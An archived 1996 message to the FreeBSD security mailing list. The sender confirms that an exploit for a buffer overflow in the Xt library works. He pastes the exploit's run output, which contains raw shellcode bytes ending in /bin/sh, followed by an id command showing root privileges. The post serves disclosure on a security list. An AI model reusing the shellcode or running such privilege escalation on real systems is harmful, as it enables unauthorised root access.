Date: Sun, 25 Aug 1996 13:48:21 +0200 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@FreeBSD.ORG Cc: security-officer@FreeBSD.ORG Subject: Re: Vulnerability in the Xt library (fwd) Message-ID: <199608251148.NAA25686@keltia.freenix.fr> In-Reply-To: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>; from Kent Hamilton on Aug 25, 1996 1:05:20 -0500 References: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>
index | next in thread | previous in thread | raw e-mail
[-- Attachment #1 --]
According to Kent Hamilton:
> Thought this might be of interest.
I confirm that it works like a charm here :-(
357 [13:44] roberto@keltia:~/src/C> ./exploit
Using offset of esp + 0 (efbfd3b0)
Buffer size 1491
Warning: Color name "ë#^^
1ÒVVVV1À°;N
ÊRQSPëèØÿÿÿ/bin/sh´Ó¿ï´Ó¿ïë#^^
1ÒVVVV1À°;N
ÊRQSPëèØÿÿÿ/bin/sh´Ó¿ï´Ó¿H³¿ï!
# id
uid=101(roberto) euid=0(root) gid=10(staff) groups=10(staff), 0(wheel), 2(kmem), 5(operator), 6(man), 8(news), 15(cvs), 20(majordom), 21(list), 100(copains), 117(dialer), 2000(dos), 2001(tex)
I saw the discussion on Bugtraq. There are a lot of fixed buffers in X as I
recall.
--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 2.2-CURRENT #18: Sun Aug 18 19:16:52 MET DST 1996
[-- Attachment #2 --]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
iQCVAwUBMiA9gwDy2QnruxtBAQGybgP/SFbjUahCvBxn2C7SR8irUwKquF6mOdcS
Z4skE4JF8m1Lf86Nn9ixxs0WIpVtLMQcP5AcijkiMQGPHhwBgRTqPJcTOufkfpP0
9y1iKxWMnB4zxgxpJbT1DHOVhrKRqbbn1xHO/W+i6eH6WHrLRKyCC1j7k1YZBLL4
YQr0Z9n5Bo4=
=sX2i
-----END PGP SIGNATURE-----
help
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199608251148.NAA25686>